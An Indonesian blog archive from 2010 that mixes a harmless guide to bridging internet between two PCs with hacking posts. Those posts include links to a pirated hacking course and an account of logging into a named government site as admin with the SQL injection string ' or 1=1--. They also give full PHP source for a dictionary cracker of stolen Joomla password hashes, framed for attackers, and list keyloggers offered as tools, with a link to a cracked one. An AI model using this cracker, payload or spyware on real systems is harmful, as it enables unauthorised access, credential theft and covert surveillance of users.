Minggu, 27 Juni 2010

Sharing Internet untuk 2 PC dengan Bridge Windows

Tutorial Jaringan kali ini erat sekali hubungannya dengan tutorial penulis sebelumnya, yakni mengenai “Koneksi 2 PC menggunakan kabel Cross”, sehingga sebelum membaca artikel ini lebih lanjut, penulis sarankan untuk membaca artikel tersebut.
Bagi seorang yang memiliki akses internet di rumah mungkin pernah menemui kasus seperti bagaimana caranya membagi koneksi internet hanya untuk 2 pc. Bisa saja menggunakan switch atau hub, kemudian memasangkan kabel modem adsl ke dalam switch atau hub tersebut kemudian membagi koneksi berdasarkan topologi jaringan star. Penulis rasa ini hanya menghabiskan resource saja, dan dana yang keluar tentunya lebih besar lagi.
Dibutuhkan satu buah switch, sekitar beberapa minggu yang lalu penulis cek harga hub 8 port itu sekitar Rp 250 ribu. :( , dan dibutuhkan 2 kabel jenis strike, di tambah 4 buah RJ 45, hmmm... berapa kira-kira dana yang habis di keluarkan ?? Kurang lebih sekitar Rp 270 ribu. :(   Mungkin bisa kurang. Tergantung yang jual temen atau bukan. Harga temen sekitar ... Lah jadi jualan ?? :D ~~
Beda halnya jika kita menggunakan topologi bus yang hanya membutuhkan satu buah lan card tambahan, dipasang pada salah satu pc, dan satu buah kabel jenis cross, tentunya bisa meminimalisir biaya yang akan dikeluarkan, satu buah lan card harganya sekitar Rp 45 ribu. Sisanya bisa dipakai untuk pedi cure dan medi cure ...
Hanya dibutuhkan satu buah lancard tambahan, dan satu buah kabel cross. Lan card tambahan dipasang di salah satu pc, dan pc ini harus terhubung secara langsung ke modem adsl, seperti pada gambar di atas. Dengan kata lain, 2 lan card inilah yang nantinya akan dijadikan sebagai bridge. Perlu diketahui bridge dalam windows XP biasanya hanya memiliki satu alamat IP.
Penulis tegaskan kembali, teknik yang satu ini berbeda dengan teknik ketika anda membuat dial connection type PPoE (biasanya digunakan pada broadband ADSL). Dial connection langsung dari PC berakibat  pc yang mendial connection tersebut akan memiliki IP Public. Nah itu adalah alasan penulis membuat artikel ini. Dengan kata lain, pada teknik ini yang memiliki ip public nantinya adalah si modem itu sendiri. Bukan PC yang melakukan Dialing connection. PC di sini hanya berfungsi sebagai bridge saja. Bukan mendial connection.
Setelah terpasang jaringan seperti pada gambar, langkah selanjutnya adalah menyetting komputer yang memiliki 2 lan card tersebut.
1.    Klik Start > Run > ketik Regedit [enter]
2.    Masuk ke : HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters
3.    Ubahlah Nilai dari “IPEnableRouter” menjadi 1
4.    Tutup Regedit.
5.    Restart PC.
Langkah selanjutnya adalah membuat bridge dari 2 LAN Card pada pc tersebut. Caranya adalah, masuk ke Control Panel ? Network Connection, kemudian klik kanan dan pilih bridge connection.

Tunggu sebentar hingga terdapat 1 koneksi baru, yaitu network bridge.

Kemudian klik kanan Network Bridge tersebut, pilih properties, pada adapters centang 2 lancard yang akan dijadikan bridge,

pada This Connection Use the following items, pilih Internet Protocol (TCP/IP) kemudian klik button Properties. Untuk pengisian IP Address, di haruskan 1 class dengan modem adsl, pada gambar ini terlihat, PC yang di jadikan Bridge mempunyai IP, 192.168.1.2, dan Modem ADSL sebagai Gatewaynya adalah 192.168.1.1, Preferres DNS server di sini adalah DNS milik ISP.

Selesai kemudian Ok.
Selanjutnya adalah settingan pada client, yakni di haruskan untuk menggunakan IP Class yang sama dengna bridge, anda bisa menggunakan 192.168.1.3 – 192.168.1.254, dengan Default Gatewaynya mengarah kepada Bridge, yakni 192.168.1.2, dan DNS Server mirip dengan propertiesnya bridge. Ya, selesai, anda sudah dapat menggunakan fasilitas bridge ini untuk berinternet ria.

selamat mencoba

Hacking Video – Career Academy Hacking


Hacking Video   Career Academy Hacking tutorial hacking web desain 
grafisLagi-lagi video hacking bertebaran secara gratis. Yup, baru-baru ini ilmuwebsite staff menemukan harta karun luar biasa, video hacking academy, mulai dari Ethical Hacking, Penetration Testing, Footprinting, Reconnaissance, TCP IP Basics ,Scanning, Honeypots, Honeynets sampai dengan wireless hacking pun dibahas dalam video. Yang lebih menarik lagi, didalamnya di sediakan demo penetration testing lebih dari 300+ vulnerability. :D ---- dan tentunya sebanding dengan kapasitasnya yang lebih dari 3 GB.

Silahkan bagi yang tertarik untuk mendownloadnya :

-Training Module 1 Ethical Hacking and Penetration Testing - cd 1
-Training Module 2 Footprinting and Reconnaissance - cd 2
-Training Module 3 TCP IP Basics and Scanning - cd 3
-Training Module 4 Enumeration and Verification - cd 4
-Training Module 5 Hacking Defending Wireless Modems - cd 5
-Training Module 6 Hacking Defending Web Servers - cd 6
-Training Module 7 Hacking Defending Web Applications - cd 7
-Training Module 8 Sniffers and Session Hijacking - cd 8
-Training Module 9 Hacking Defending Windows Systems - cd 9
-Training Module 10 Hacking Defending Unix Systems - cd 10
-Training Module 11 Rootkits Backdoors Trojans Tunnels - cd 11
-Training Module 12 Denial of Service and Botnets - cd 12
-Training Module 13 Automated Pen Testing Tools - cd 13
-Training Module 14 Intrusion Detection Systems - cd 14
-Training Module 15 Firewalls - cd 15
-Training Module 16 Honeypots and Honeynets - cd 16
-Training Module 17 Ethics and Legal Issues - cd 17
http://rapidshare.com/files/194379379/Gxc.VT.CAHPTaCT_UDS.part01.rar
http://rapidshare.com/files/194382133/Gxc.VT.CAHPTaCT_UDS.part02.rar
http://rapidshare.com/files/194377149/Gxc.VT.CAHPTaCT_UDS.part03.rar
http://rapidshare.com/files/194377617/Gxc.VT.CAHPTaCT_UDS.part04.rar
http://rapidshare.com/files/194379332/Gxc.VT.CAHPTaCT_UDS.part05.rar
http://rapidshare.com/files/194377712/Gxc.VT.CAHPTaCT_UDS.part06.rar
http://rapidshare.com/files/194377133/Gxc.VT.CAHPTaCT_UDS.part07.rar
http://rapidshare.com/files/194379107/Gxc.VT.CAHPTaCT_UDS.part08.rar
http://rapidshare.com/files/194379430/Gxc.VT.CAHPTaCT_UDS.part09.rar
http://rapidshare.com/files/194377280/Gxc.VT.CAHPTaCT_UDS.part10.rar
http://rapidshare.com/files/194379072/Gxc.VT.CAHPTaCT_UDS.part11.rar
http://rapidshare.com/files/194380389/Gxc.VT.CAHPTaCT_UDS.part12.rar
http://rapidshare.com/files/194379054/Gxc.VT.CAHPTaCT_UDS.part13.rar
http://rapidshare.com/files/194379376/Gxc.VT.CAHPTaCT_UDS.part14.rar
http://rapidshare.com/files/194377484/Gxc.VT.CAHPTaCT_UDS.part15.rar
http://rapidshare.com/files/194379264/Gxc.VT.CAHPTaCT_UDS.part16.rar
http://rapidshare.com/files/194380491/Gxc.VT.CAHPTaCT_UDS.part17.rar
http://rapidshare.com/files/194379192/Gxc.VT.CAHPTaCT_UDS.part18.rar
http://rapidshare.com/files/194379700/Gxc.VT.CAHPTaCT_UDS.part19.rar
http://rapidshare.com/files/194377767/Gxc.VT.CAHPTaCT_UDS.part20.rar
http://rapidshare.com/files/194378937/Gxc.VT.CAHPTaCT_UDS.part21.rar
http://rapidshare.com/files/194380403/Gxc.VT.CAHPTaCT_UDS.part22.rar
http://rapidshare.com/files/194379344/Gxc.VT.CAHPTaCT_UDS.part23.rar
http://rapidshare.com/files/194377766/Gxc.VT.CAHPTaCT_UDS.part24.rar
http://rapidshare.com/files/194381936/Gxc.VT.CAHPTaCT_UDS.part25.rar
http://rapidshare.com/files/194379027/Gxc.VT.CAHPTaCT_UDS.part26.rar
http://rapidshare.com/files/194379882/Gxc.VT.CAHPTaCT_UDS.part27.rar
http://rapidshare.com/files/194379279/Gxc.VT.CAHPTaCT_UDS.part28.rar
http://rapidshare.com/files/194377828/Gxc.VT.CAHPTaCT_UDS.part29.rar
http://rapidshare.com/files/194379311/Gxc.VT.CAHPTaCT_UDS.part30.rar
http://rapidshare.com/files/194385532/Gxc.VT.CAHPTaCT_UDS.part31.rar
http://rapidshare.com/files/194385469/Gxc.VT.CAHPTaCT_UDS.part32.rar
http://rapidshare.com/files/194383279/Gxc.VT.CAHPTaCT_UDS.part33.rar
http://rapidshare.com/files/194385282/Gxc.VT.CAHPTaCT_UDS.part34.rar
http://rapidshare.com/files/194385524/Gxc.VT.CAHPTaCT_UDS.part35.rar
http://rapidshare.com/files/194385305/Gxc.VT.CAHPTaCT_UDS.part36.rar
http://rapidshare.com/files/194381537/Gxc.VT.CAHPTaCT_UDS.sfv
mirror  :
http://www.megaupload.com/?d=HROI2ZAV
http://www.megaupload.com/?d=242ZNM7E
http://www.megaupload.com/?d=QY14I10X
http://www.megaupload.com/?d=NHOLUTCO
http://www.megaupload.com/?d=Y9BSB284
http://www.megaupload.com/?d=5GCV9UA3
http://www.megaupload.com/?d=J41JSY0G
http://www.megaupload.com/?d=TXKSRAI8
http://www.megaupload.com/?d=DHF8UMKY
http://www.megaupload.com/?d=RLXSOPTK
http://www.megaupload.com/?d=5O0YFY79
http://www.megaupload.com/?d=RLHUHJDS
http://www.megaupload.com/?d=YNVEK8LB
http://www.megaupload.com/?d=RNYWZ64V
http://www.megaupload.com/?d=J42I6OSZ
http://www.megaupload.com/?d=1EC6S73S
http://www.megaupload.com/?d=25CAZSL2
http://www.megaupload.com/?d=0BZ0FPO1
http://www.megaupload.com/?d=JRPO74HU
http://www.megaupload.com/?d=Z6S34VR6
http://www.megaupload.com/?d=TDXJH9JZ
http://www.megaupload.com/?d=GNCSKLL3
http://www.megaupload.com/?d=LYI3SY94
http://www.megaupload.com/?d=8D3E0R6O
http://www.megaupload.com/?d=0022RC7Z
http://www.megaupload.com/?d=ASMBUELW
http://www.megaupload.com/?d=5XMX3AIZ
http://www.megaupload.com/?d=IPWD9NSU
http://www.megaupload.com/?d=DWQ3469B
http://www.megaupload.com/?d=WL91FDR7
http://www.megaupload.com/?d=TISTATGB
http://www.megaupload.com/?d=1OTQAHLA
http://www.megaupload.com/?d=Q2JTKAHH
http://www.megaupload.com/?d=OUNUNGAP
http://www.megaupload.com/?d=K4GMUQYF
http://www.megaupload.com/?d=QJNKWK0H
http://www.megaupload.com/?d=HP3D8TLB
mirror 2
http://www.mediafire.com/?sharekey=283842fd3dc3e7ef91b20cc0d07ba4d2abc972a2ae368c4b

semoga bermanfaat  :D:D:D

PHP Security – Cek Bug PHP Script


PHP Security   Cek Bug PHP Script tutorial hacking web desain 
grafisSetelah terampungkan script php yang telah kita buat ada  kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah  siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat  dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi  system.
   
Dan siapa sangka script php yang telah dibuat itu aman  dari kerentanan dalam masalah security. :D ~~~
   
Lalu, bagaimana mencegah sang hacker mengekploitasi,  bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui  script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua  ??  :D
 

Sebelum kita beralih maju ke langkah selanjutnya ada  baiknya untuk mengenali bug popular yang paling sering diexploitasi.
Penulis akan mencoba untuk memberikan sedikit penjelasan,  bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content  Management system maupun yang lainnya. Di antaranya :
- XSS ( Cross Site Scripting )- SQL Injection
- RFI ( Remote File Inclusion )
Cross Site Scriping
Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi  karena tidak adanya filtering pada html maupun java script.
 
Tetapi pada dasarnya defacing ( perubahan kontent ) hanya  terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat  mencuri cookie  kemudian menggunakannya  untuk berbuat sesuatu yang ... :D ~~
 
Contohnya :
Sensored [ maaf ]
SQL Injection
SQL Injection sebenarnya terjadi karena seorang attacker  yang mencoba melakukan inject query sql   melalui form ataupun via address bar pada browser internet.  Sebagai contohnya ketika penulis mencoba login  sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id  ).  Dengan menggunakan query ' or 1=1--  penulis pun berhasil login. Pada dasarnya ' atau single quote dan or 1=1-- itu  berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh  server sql adalah menjalankan query " select * ". Yang terjadi adalah  penulis diloloskan untuk login sebagai admin.
   
Berikut adalah gambar yang penulis capture ketika penulis  berhasil login sebagai admin pada situs http://www.sumsel.go.id
Gambar ini diambil sebelum penulis mengontak webmaster  via email untuk mempatch script phpnya.
   
RFI ( Remote File Inclusion )
Sebelumnya silahkan membaca artikel fungsi require, require_once, include, dan include_one RFI sendiri terjadi karena kesalahan programmer ketika  melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut.  Apabila user memasukkan url evil script miliknya pada variable yang digunakan  dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut  dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan  command di server milik anda untuk merubah konten situs atau bahkan merusaknya.  :D ~~
Untuk contohnya silahkan anda cari di www.milw0rm.com :D ~
Keywordnya Remote File Inclusion. :D ~
Pengecekan BUG
Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm  ... tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat  secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara  tidak sengaja maupun sengaja. :D ~
   
Pada dasarnya untuk mengecek bug dapat dilakukan secara  online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di  localhost anda ( offline ) saja.
Cek Bug XSS
Tools untuk mengecek XSS pada script php milik anda  adalah sebuah addons mozilla firefox yang disediakan secara gratis.  Penginstallannya pun tergolong mudah, berikut juga cara penggunaannya.
   
Tools tersebut dapat  anda download disini :

http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi
Cek Bug SQL Injection
Untuk periode saat ini defacing dengan SQL Injection  digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena  penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax  sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah  digunakan telah disediakan untuk melakukan cek bug sql injection. :D
   
Anda dapat mendownloadnya disini :
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi
Penggunaanya pun tidak terlalu sulit.
Cek BUG Remote File Inclusion
Sebelumya anda download terlebih dahulu scriptnya disini http://www.newhack.org/dl_jump.php?id
Setelah itu silahkan download active perl, compiler  interpreter ini nantinya digunakan untuk menjalankan script  inclusionscanner.pl.
Dan kemudian copykan inclusionscanner.pl tersebut ke  direktori c:perlbin
Langkah selanjutnya :
1. Masukkan  script  yang akan anda scan kedalam sebuah direktori di c:perl php.
ex : c:perlwordpress.
2. Masuk ke command prompt, start | run | cmd | enter
3.  Setelah itu  masuk ke direktory c:perlbin, cd c:perlbin
4. Jalankan scriptnya,
C:Perlbin>perl.exe inclusionscanner.pl
#Will check a directory for all includes and unsets
#Coded by Ironfist (ironsecurity.nl)
#Usage: create a folder in your perlfolder and put the  files to be scanned in it
, next type the folder name below (eg myfolder)
#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :)
 
Directory to read? c:perlwp
 
kemudian lihat hasilnya di c:perlbinresult.html
 
berikut hasil scan ketika penulis mencoba untuk melakukan  cek inclusion pada wordpress-2.3.3 :
   
  FOUND: require_once($locale_file);
  in c:perlwp/wp-settings.php FOUND:  require_once($import_root . '/' . $file);
  in c:perlwp/wp-admin/import.php FOUND:  include_once($this->PluginDir . "class-smtp.php");
  in c:perlwp/wp-includes/class-phpmailer.php FOUND:  include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
  in c:perlwp/wp-includes/class-phpmailer.php FOUND:  include($lang_path.'phpmailer.lang-en.php');
  in c:perlwp/wp-includes/class-phpmailer.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  include($template);
  in c:perlwp/wp-includes/template-loader.php FOUND:  require_once($_template_file);
in c:perlwp/wp-includes/theme.php



selamat mencoba...  

Konsep sederhana Joomla Password Cracker


Konsep sederhana Joomla Password Cracker tutorial 
hacking web desain grafisApa yang akan penulis jelaskan disini, begitu juga dengan apa yang telah penulis jelaskan pada tutorial sebelum-sebelumnya, mengenai hacking tentunya, di ibaratkan seperti pisau yang memiliki 2 sisi tajam, di satu sisi seorang admin web dapat menjaga ketat sitenya dengan aman, namun patut diketahui pula tidak ada sistem yang memiliki keamanan 100%, selalu saja ada bolong yang masih dapat di eksploitasi,tapi setidaknya dapat meminimalisir serangan yang ada, dan di sisi lain yang akan penulis terangkan nanti tentunya cenderung digunakan untuk kegiatan vandalisme/merusak oleh beberapa pihak. Ya, tidak heran jika teori tesis dan anti tesis kerapkali hadir dalam dunia perhackingan ini. Di satu sisi membangun tapi di sisi lain menghancurkan. Lantas yang harus di lakukan sekarang adalah, tetap waspada pada security risk yang ada, dan ketahuilah tamu tak diundang selalu menyempatkan waktunya untuk hadir memonitoring site anda, jika anda melakukan sedikit saja salah langkah akibatnya cukup fatal.
Waha... sepertinya intro tutorial harus dipisahkan sendiri dalam tutorial yang berbeda, jari penulis begitu asik menari-nari di atas tuts keyboard sampai-sampai lupa pada pokok pembahasan. :D .
Ya, berdasarkan artikel sebelumnya, betapa mudahnya seorang attacker mendapatkan username dan password sang administrator pada content management system seperti joomla, tapi masih terdapat satu masalah,  dimana seorang attacker masih belum dapat melakukan eksploitasi lebih lanjut, dikarenakan password yang didapatkan itu masih dalam bentuk password yang terenkripsi, sehingga butuh perlakuan khusus lebih lanjut untuk mendapatkan password yang sesungguhnya. Di sinilah penulis akan mencoba menjelaskan sebuah konsep sederhana bagaimana mendapatkan suatu password asli yang terenkripsi, namun penulis hanya membatasi cracking password pada satu jenis hash saja, yaitu joomla hash password. Penjelasan yang akan penulis lakukan bukanlah mencoba membuat algoritma dekripsi password tetapi hanyalah penggunaan metode dictionary file, dimana untuk mendapatkan password asli cukup dilakukan pencocokan password dengan kamus data yang ada sehingga menghasilkan password yang sebenarnya. :D . Namun setiap aplikasi selalu saja memiliki kekurangan, penulis tidak menafikan hal itu. Karena kesempurnaan hanyalah milik sang Pencipta. ;) Kekurangannya adalah resource memori yang di butuhkan untuk metode seperti ini cenderung lebih besar dari ukuran biasanya.
Berikut adalah source code lengkap 'simple joomla password cracker' :
-----------------------// cut here
<HTML>
<HEAD>
<BASEFONT SIZE=3>
<TITLE>::: Joomla Password Cracker :::</TITLE>

</HEAD>

<BODY BGCOLOR=#000000 vlink=#0000FF>

<center>
<p align="center"><font face="Verdana" size="1"><BR>
</B><BR>
  </font></p>
<p align="center"> </p>
<p align="center"> </p>
<TABLE BORDER=0 WIDTH=500 CELLPADDING=3 CELLSPACING=0>
<tr><td> <p align="center" style="margin-top: 0"><font color="#FFFFFF" face="Verdana" size="2"><u><font size="4">Simple</font></u>
</font><font size="4"><u><font face="Verdana" color="#00FF00"><strong>Joomla</strong></font> <font color="#FFFFFF" face="Verdana">Password Cracker</font></u></font><font size="2"><font color="#FFFFFF" face="Verdana"><br>
<font color="#00FF00">Developed by<strong> : ilmuwebsite.com </strong></font></font></font></p>
    </td>
</tr>
</table>
<!--  Demonstration -->
<BODY>
<center>
  <form action=index.php method="POST"><p>
    <P>
<b>
<font size="2" face="Verdana" color="#FFFFFF"><u>Masukkan  </u></font></b><u><font size="2" face="Verdana" color="#FFFFFF">password hashnya disini :</font></u><font size="2" face="Verdana" color="#FFFFFF"></font><font color="#00FF00" size="1" face="Verdana"><br>
<BR>
<input type="text" name="hash" size=55 style="font-family: Verdana; font-size: 8pt; color: #00FF00; border: 1px solid #00FF00; background-color: #000000">
<input type="submit" name="send" value="Cari !!!" style="font-family: Verdana; font-size: 8pt; color: #00FF00; border: 1px solid #00FF00; background-color: #000000">
</font>
<P><br>

</form>

<?php
$hashes=array();
$i=0;
$parts=explode(":",$_POST['hash']);
$hashes[$i][0]=$parts[0]; 
$hashes[$i][1]=$parts[1];

if (ISSET($_POST['hash']))
{
$str = " ";
echo "<font size=2 face=Verdana color=#FFFFFF><u>Started: </u>";
echo date("F j, Y, g:i:s a");

$lines = file('kamus2.txt');

foreach ($lines as $line_num => $line)
{
check($line);
}

$lines = file('kamus1.txt');

foreach ($lines as $line_num => $line)
{
check($line);
}

echo "<br><font size=2 face=Verdana color=#FFFFFF><u>Finished : </u>";
echo date("F j, Y, g:i:s a");

}

function check($a)
{   
global  $i;
$a=rtrim($a) ;

for($x=0;$x<=$i;$x++)
{
global  $hashes;

if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo "<font size=2 face=Verdana color=#FFFFFF><br><br><u>The password is : </u></font><font size=2 face=Verdana color=#00FF00><h1>$a</h1></font>";
echo "<u>Ended: </u>";
echo date("F j, Y, g:i:s a");
}

}
        
}
?>
<font size="2" face="Verdana" color="#FFFFFF"><u><br><br>Tolong di kembangkan ya ?! :D </u></font>
</center>
</body></html>

-----------------------// cut here
Untuk menjalankan script ini di localhost anda perlu merubah konfigurasi php.ini, yaitu dengan mengganti baris ini :
memory_limit = 32M ;
Konsep sederhana Joomla Password Cracker tutorial 
hacking web desain grafis
menjadi > 32, penulis menggantinya menjadi :
memory_limit = 256M ;
Ya, sebelum berlanjut, penulis akan membahas struktur password joomla yang terenkripsi terlebih dahulu, enkripsi password joomla biasanya terdiri dari hash dan salt.  Standar enkripsi joomla biasanya berbentuk seperti ini :
b51498faae03f7cf533e3ed97fc00116:9VrQpQzdNQHhtieK
Hashnya itu terdapat pada bagian yang pertama yaitu b51498faae03f7cf533e3ed97fc00116, dan saltnya itu ada di bagian akhir 9VrQpQzdNQHhtieK, keduanya terlihat di pisahkan dengan titik dua ":". Salt bagi seorang attacker berfungsi untuk membantu dalam pencarian password sesungguhnya.
Yang ditemukan disini adalah jika password berbentuk plain text di gabung dengan saltnya maka akan menghasilkan hash password joomla. Dengan kata lain jika : x + salt = hash joomla. Sehingga jika di implementasikan melalui enkripsi md5 :
md5(x + salt) = hash
maka :
md5(x + 9VrQpQzdNQHhtieK) = b51498faae03f7cf533e3ed97fc00116
berapakah x ? ( pak Mamat guru matematika di SMAN 4 Bogor kayanya tau. :D huehuehuehehe...  )
Ya seperti pada baris kalimat ini :
...
if (md5($a.$hashes[$x][1]) === $hashes[$x][0])
{
echo "<font size=2 face=Verdana color=#FFFFFF><br><br><u>The password is : </u></font><font size=2 face=Verdana color=#00FF00><h1>$a</h1></font>";
...
Dan hasilnya adalah ...
Konsep sederhana Joomla Password Cracker tutorial 
hacking web desain grafis
:D ~~
Penulis yakin anda cukup familiar dengan source di atasnya. Dan algoritmanya pun cukup mudah. Script lengkap dan kamus passwordnya dapat di download di sini ...
Selamat mencoba. Selamat mengembangkan ! :D
Greetz for : b_scorpio, peterpanz, abuzahra, phii_, nazwa, jojo, ivan, fadli, safril, dr.emi, husniearif, [H], dan ilmuwebsite community.

sumber http://www.ilmuwebsite.com

Koleksi 63 Keylogger Pilihan

 Koleksi
 63 Keylogger Pilihan tutorial hacking web desain grafisBagi para lamerz maniak hacking tools pasti sering mendengar keylogger. :D . Apa sih keylogger ? Keylogger merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang dilakukan user pada program tersebut, dan semua yang diketikkan di keyboard hingga pergerakan mouse, bahkan beberapa keylogger yang telah lama beredar mengincludekan fasilitas pengcapture layar monitor setiap 5 menit sekali, dan outputnya adalah HTML.

Ada beberapa keylogger yang cukup menarik, diantaranya ada yang dapat mengirim hasil dari monitoring aktivitas tersebut ke email sang penanam keylogger tersebut. Sehingga si penanam keylogger tersebut dapat melihat semua aktivitas yang dilakukan oleh user pada sebuah pc melalui email.
Jelas keylogger ini bersifat kontroversial seperti 2 mata pisau, positif, negatif, membangun dan menghancurkan. Tidak cukup waktu untuk mendiskusikan semua hal tersebut.
Untuk menambah koleksi hacking tools anda, :D silahkan unduh 63 keylogger terbaru  yang cukup handal ...
Berikut daftarnya :
1. 007 Keylogger Spy Software 3.873
2. Active Key Logger 2.4
3. Activity Keylogger 1.80.21
4. Activity Logger 3.7.2132
5. ActMon Computer Monitoring 5.20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger v1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Blazingtools Remote Logger v2.3
12. Data Doctor KeyLogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4.06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2.53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden KeyLogger 1.32
22. Handy Keylogger 3.24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3.23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1.10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key Logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6.10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4.04
46. Remote KeyLogger 1.0.1
47. Revealer Keylogger Free 1.33
48. SC Keylogger Pro 3.2
49. Smart Keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2.42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6.02.07
54. Spytector 1.3.5
55 Stealth Key Logger 4.5
56. System keylogger 2.0.0
57. Tim’s Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5.04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3.01
Mohon maaf, sementara link 63 keylogger di suspend terlebih dahulu, sampai kami upload ulang semua keyloggernya ke server local, sebagai gantinya silahkan mencoba keylogger yang tidak kalah powerfull http://hotfile.com/dl/91905/3eb88a2/Beyond.Keylogger.v3.1.Multilenguaje.Incl.KeyMaker.and.Patch-DVT.rar.html